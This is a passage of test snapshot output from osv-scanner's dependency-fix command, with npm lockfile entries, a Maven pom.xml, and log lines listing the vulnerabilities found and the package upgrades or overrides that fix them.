"2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": 
"sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": 
"sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": 
"1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- [TestCommand/fix_non_interactive_override_pom_xml_with_native_data_source - 1] Resolving /pom.xml... Found 12 vulnerabilities matching the filter Can fix 12/12 matching vulnerabilities by overriding 4 dependencies OVERRIDE-PACKAGE: org.apache.httpcomponents:httpclient,4.5.13 OVERRIDE-PACKAGE: org.codehaus.plexus:plexus-utils,3.0.24 OVERRIDE-PACKAGE: commons-io:commons-io,2.14.0 OVERRIDE-PACKAGE: org.jsoup:jsoup,1.15.3 FIXED-VULN-IDS: GHSA-2x83-r56g-cv47,GHSA-78wr-2p64-hpwj,GHSA-7r82-7xv7-xcpj,GHSA-8vhq-qq4p-grq3,GHSA-cfh5-3ghh-wfjx,GHSA-fmj5-wv96-r2ch,GHSA-g6ph-x5wf-g337,GHSA-gp7f-rwcx-9369,GHSA-gw85-4gmf-m7rh,GHSA-gwrp-pvrq-jmwv,GHSA-jcwr-x25h-x5fh,GHSA-m72m-mhq2-9p6c REMAINING-VULNS: 0 UNFIXABLE-VULNS: 0 Rewriting /pom.xml... 
--- [TestCommand/fix_non_interactive_override_pom_xml_with_native_data_source - 2] --- [TestCommand/fix_non_interactive_override_pom_xml_with_native_data_source - 3] 4.0.0 dev.osv osv-fix 1 4.5.13 commons-io commons-io 2.14.0 org.jsoup jsoup 1.15.3 org.apache.httpcomponents httpclient ${httpclient.version} org.apache.maven.wagon wagon-http 3.0.0 org.codehaus.plexus plexus-utils 3.0.24 --- [TestCommand/no_args_provided - 1] --- [TestCommand/no_args_provided - 2] manifest or lockfile is required --- [TestCommand_OfflineDatabase/fix_non_interactive_in_place_package_lock_json_with_offline_vulns - 1] Loaded npm local db from /osv-scanner/npm/all.zip Scanning /package-lock.json... Found 12 vulnerabilities matching the filter Can fix 7/12 matching vulnerabilities by changing 5 dependencies UPGRADED-PACKAGE: minimatch,3.1.2,3.1.5 UPGRADED-PACKAGE: ajv,6.12.6,6.14.0 UPGRADED-PACKAGE: brace-expansion,1.1.11,1.1.12 UPGRADED-PACKAGE: concat-stream,1.5.0,1.6.1 UPGRADED-PACKAGE: hosted-git-info,2.1.4,2.8.9 FIXED-VULN-IDS: GHSA-23c5-xmqv-rm74,GHSA-2g4f-4pwh-qvx6,GHSA-3ppc-4f35-3m26,GHSA-43f8-2h32-f4cj,GHSA-7r86-cg39-jmmj,GHSA-g74r-ffvr-5q9f,GHSA-v6h2-p8h4-qcjw REMAINING-VULNS: 5 UNFIXABLE-VULNS: 7 Rewriting /package-lock.json... 
--- [TestCommand_OfflineDatabase/fix_non_interactive_in_place_package_lock_json_with_offline_vulns - 2] --- [TestCommand_OfflineDatabase/fix_non_interactive_in_place_package_lock_json_with_offline_vulns - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, 
"node_modules/assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "dependencies": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": 
"sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.6.1", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": 
"https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": 
"sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": "*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": 
"^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": 
"sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, "engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", 
"resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": 